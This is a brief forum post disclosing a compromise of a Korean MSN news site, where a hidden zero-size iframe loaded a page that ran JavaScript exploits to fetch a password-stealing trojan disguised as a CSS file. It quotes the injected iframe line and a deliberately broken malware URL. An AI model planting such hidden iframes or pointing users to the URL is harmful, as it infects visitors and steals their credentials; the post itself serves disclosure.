Yep, earlier today if you went here: (there is a space in the URL on purpose)
http:// news.msn.co.kr/image/banner/bbs003302.css
You would get a downloader trojan. At the bottom of the site there is an iframe statement
list.htm loads bbs003302.gif with basically runs down a list of javascript exploits in attempts to run the above css file.Code:<iframe height=0 width=0 src="../../image/banner/list.htm"></iframe>
At the moment, I get 404 errors for the .css and .gif file but the iframe statement is still there. MS was notified and apparently acted *extremely* fast.
Anyway, happy Tuesday and look for some kind of story on this to appear in the upcomming days...
PS
Symantec picked up the trojan as PWSteal.Lineage
--TH13
Reply With Quote